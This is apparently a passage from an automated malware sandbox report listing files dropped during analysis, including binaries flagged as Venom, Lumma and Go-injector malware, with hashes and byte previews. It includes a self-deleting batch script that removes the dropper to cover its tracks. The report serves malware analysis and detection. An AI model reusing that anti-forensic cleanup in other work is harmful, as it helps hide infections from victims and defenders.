.F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6427.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4646
Entropy (8bit):	4.4735061016023225
Encrypted:	false
SSDEEP:	48:cvIwWl8zs0Jg77aI9diWpW8VYVYm8M4JFDD09TFS+q8v1RRGqoyoO3c9d:uIjfyI7jj7VJJt3k8tyoOM9d
MD5:	CEFEB04CF6281BC7B271A050E44489EB
SHA1:	648812B9F06989387129096AA4E499494CC2E2B9
SHA-256:	CC48560A129F4965EC6121247F870808F5A1E4712744CC87D777D2BC75AFC4CB
SHA-512:	69B8C082DB7932F440D9B182CFC5FCE2E3CC762D39B41F3434567C4887193FE2F4A8E1F200BA4B28A82886CC79498E0DA0760E2F394BA18C07463E32FCB432D8
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425340" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.2478978672539016
Encrypted:	false
SSDEEP:	6:kKBU9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:hDImsLNkPlE99SNxAhUe/3
MD5:	6B0D8C16768BA1CD16B684CAF2D40B6F
SHA1:	1CD603A137CFB1A77EF84183836C517490DD5048
SHA-256:	754FE90A97340FEEEA3AF1926F010D755D95D74F26FEBFDEB1C6338F5431AC70
SHA-512:	F76E86E7B33D4CBC2B2B19B5D559F13DF93DAAE73CA4FCD9F92998EB74DCBD0A4F998BAA3EB89CD742F4A61D1DEA474E180322841195E2586327B177C18AF5C9
Malicious:	false
Preview:	p...... ................(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\753F.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\753F.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1515
Entropy (8bit):	5.3602768626210215
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNXE4ZR:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	366F3274873188864F1C9DC2A155FE99
SHA1:	DC6D430ADC2BF68980D60D32832F937A19002970
SHA-256:	942877BF38C3575135E9008E3C2880D64ED5D43E32F125E05DD4D969357EB92F
SHA-512:	1146FD3F3661BF222A48E0C51909C64A57B322556D8C43DDCEB2CF7A3F07F99B7AECC843211B3598643EF447D651873BA13AD335FB74004CE3B51F8F98C22156
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vm.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	942
Entropy (8bit):	5.350509596383769
Encrypted:	false
SSDEEP:	24:ML9E4KiE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKiHKnYHKh3oPtHo6hAHKzeR
MD5:	B6D3844EAA406C781DC083A57D80B31D
SHA1:	A86C11005B4765CF80CE96F09686B601DD3F87D7
SHA-256:	FC52CE6F1AE1858EFB752C50FD39D3FD82CC2605B95E94B9C16FB9220BC25D20
SHA-512:	08CD3FFA613D2A95564DFEBBE5C9CFB3CA7B903BAF0F1105AECB039420C9126B06A1CA6D7DA562F18DB1C28B4877D84C98AE74C7AB4799DE8B8C5381F4390462
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

Download File

Process:	C:\Windows\explorer.exe
File Type:	JSON data
Category:	modified
Size (bytes):	1018
Entropy (8bit):	5.235990633565231
Encrypted:	false
SSDEEP:	24:YqHZ6T06Mhmpvmyb0O0bihmAvmy6CUXyhmDvmybxdB6hmKvmyz0JahmlvmybNdBd:YqHZ6T06McEyb0O0biczyDUXycaybxdp
MD5:	0D158326133D9F27F44A933593B668BB
SHA1:	634FB34DC528526CA14417C73DBC57C6A1155D28
SHA-256:	F0C4D41D7073B5255B4F85056C20C29F4435D540A0C9D6D9EED8B38F6508D9FC
SHA-512:	D108588E8D57AC94B4763A8C07C25E62F11CB089084791E5DF7C0621E3229E0637B9BBCE1AC26583889230B2517125CAC680CFD688BEFF5159C88771A9F89024
Malicious:	false
Preview:	{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":1015884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":1005884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":995884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":985884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":975884592,"LastSwitchedHighPart":31061873,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":965884592,"LastSwitchedHighPart":31061873,"Pre

C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\NotifyIcon\Microsoft.Explorer.Notification.{88B8C382-1A26-F976-8F93-4F607D4F11B3}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	404
Entropy (8bit):	7.237769240723788
Encrypted:	false
SSDEEP:	12:6v/78/vlRYiss4zKRkj051UImYiyx5NDqxa5U6:16/KSI/mODN+xh6
MD5:	3905593FDAF39CF1418D923565E08345
SHA1:	20B73D80CADF71956847FFBE0E264811D03680EE
SHA-256:	156521BB822C49F02192EFB0062095AC0710A36E02F50D72F26AAD6C50F27479
SHA-512:	6EF1E8F393AC0FD89D58E29F44602E21AD3829F47CE9FE43C9E8F9F2F14FCEBAC3A2F04DE8671767F57922C0144FBDEE812548DC6DB25CBC800271AD25D9102D
Malicious:	false
Preview:	.PNG........IHDR................a....sRGB.........gAMA......a....>IDAT8O.?K.A..g.lDlUr`c#.$...m.S.(...6..E..+...H@..pIk."....k.Bo\|sY<m...?nwf...]...1....\..x..!.YFT..'&..Q.u.5...=.u..NY...+s.u-.p.q..C..y..s...+$.E...i..N......%vO.?...BZ%v:}..;X.Y..Vx.....o.........aoj6..../P7u5.L.-.2..x..s.E?B...1=.o.7.K..;...sd......vl......5..}L.4..^.......&...+.s.....6..j....;..huC-.<....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k1[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k1[2].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k2[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k3[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k4[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\k5[1].rar

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9434
Entropy (8bit):	4.928515784730612
Encrypted:	false
SSDEEP:	192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
MD5:	D3594118838EF8580975DDA877E44DEB
SHA1:	0ACABEA9B50CA74E6EBAE326251253BAF2E53371
SHA-256:	456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
SHA-512:	103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Temp\02DD5A3F.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\3FF9770D.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\47F11985.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\4CAE0F08.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\666819F5.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\740D5605.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\753F.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	141944
Entropy (8bit):	5.653169478479977
Encrypted:	false
SSDEEP:	1536:0OrbHDFbGsQ/Q/WGX5Nqzaiz1agCDP2zJ43MOkCYZZ2vWFx6qKZ:9rLDFbGYHiYbP2qkf2Kx6N
MD5:	B6A1C0998D0A7979C9EC17B8D5CF8A81
SHA1:	32154E9BDCD0975A4095A88B68834E2DA21412DD
SHA-256:	4F7DB945B8F377AD28938F23F283E04454818FA0D9C4C692A30BCE2D12B66389
SHA-512:	80EA862F84FC9FBF67607D31177161D908F12FA720C0984AD20BDB9E33C215E781BE3C20B7AB327476966F4E224A993E557975536A229EC8B1F5DD531613A980
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......e.........."...0..4............... .....@..... .......................@............`...@......@............... ...............................`..................x&........................................................................... ..H............text....2... ...4.................. ..`.rsrc........`.......6..............@..@........................................H...........h...........(G...............................................0..).............(.....o.......-..................J.(.....(....}.....0..I........{......~....~....o....,.r...ps....z.{......~....~....o....,.r=..ps....z..{....o....,.rs..ps....z..}.......0..C........{.......o....,%r...p.....(..........(....(....s....z..s.....(.....s....t......0..T....... ..75 ?h.. .... .... ..... .....O .... .... ....s.........(....(...+o....s.........V.(......}......}....*...0..........

C:\Users\user\AppData\Local\Temp\7760095b.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXDaI.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	182
Entropy (8bit):	4.931753548379707
Encrypted:	false
SSDEEP:	3:jdKZOMERE2J5xAI2JHyMD2UMERE2J5xAI2JH4KReJsjIdKZOMERE2J5xAINIK4Iv:jdKoFi23f+yMD2UFi23f+4/dKoFi23fr
MD5:	921FD71A35A531B0B52E31C36C2DAB6D
SHA1:	FFBAC53652FE1F8C015A7D91CD396ED1EE37EE2C
SHA-256:	6D91CC018A2BE12D73ADF48E0D348B668DF53F80CFD253C967F62D619C96705F
SHA-512:	1CABE7B03F5FFAA5839BA923EC61997FE869B6EF58EB1353220B0FC4DB544FE3624F274B48421BE5D7EC99B4616AC3E142EDD2FADFDCBD0B534400B13159C3C6
Malicious:	false
Preview:	:DELFILE..del "C:\Users\user\AppData\Local\Temp\IXDaI.exe"..if exist "C:\Users\user\AppData\Local\Temp\IXDaI.exe" goto :DELFILE..del "C:\Users\user\AppData\Local\Temp\7760095b.bat"..

C:\Users\user\AppData\Local\Temp\B552.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	11672576
Entropy (8bit):	6.48028581980635
Encrypted:	false
SSDEEP:	98304:LzqI+neqpiuNs3zHlse+SRWSlwEO5zwnJY:N5uNs3zF5+SNJOk
MD5:	D3785ED170CDB1F4784D3DFF3A61DAE0
SHA1:	4BB2D65976DB66FC918C354AA4B2D1162B2420BA
SHA-256:	505968DFF5E73B6DB05CAAA86EA34633140EC3B7BB75B19167AF7CE4AF641259
SHA-512:	3D5C970C602F31E873E655EAB73DAEE3823717E10CF0D660FF59F333F735E3F0C6B13ED15875C10BB39876CC24E48CC73937382F40C9A364BD0DB7745BFF29DD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Local\Temp\B552.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.,I....................@.....................................4....`... ......................................P..N....`..X.......W...................`.............................. ...(....................d..X............................text....+I......,I.................`.``.data........@I......0I.............@.`..rdata..P.X...T...X...S.............@.`@.pdata............................@.0@.xdata..P...........................@.0@.bss.....~...........................`..edata..N....P......................@.0@.idata..X....`......................@.0..CRT....p...........................@.@..tls................................@.@..rsrc...W...........................@.0..reloc.......`.......t..............@.0B................................................................................................................................

C:\Users\user\AppData\Local\Temp\ExtractedLumma\data.bin

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	338427
Entropy (8bit):	7.999421481430211
Encrypted:	true
SSDEEP:	6144:NGuYnZvCloK9BLa2VS1T6dH5IxUt/eiFLj//4RLu7HuayKy8R5spw0:EuYhClokzVjdyx6Tj/gRsHpyKy8wS0
MD5:	CCC6A76DAC238257CF8CFFE352B3E5C4
SHA1:	B2705A5A08E1FAA0E4D3097F79EA9FD09C8189FA
SHA-256:	3C2768836296463361FFBC8F105F713B1059EA6F22C3272FFB9C77D41CA86024
SHA-512:	611628A9D2F81012A04F6B5E8A43C111ACF7DB1FED3042A4609A7FC8F6591775E013580A73F621B96F81D8B3C831F0698D7070451B6332E3076041C04097F42A
Malicious:	false
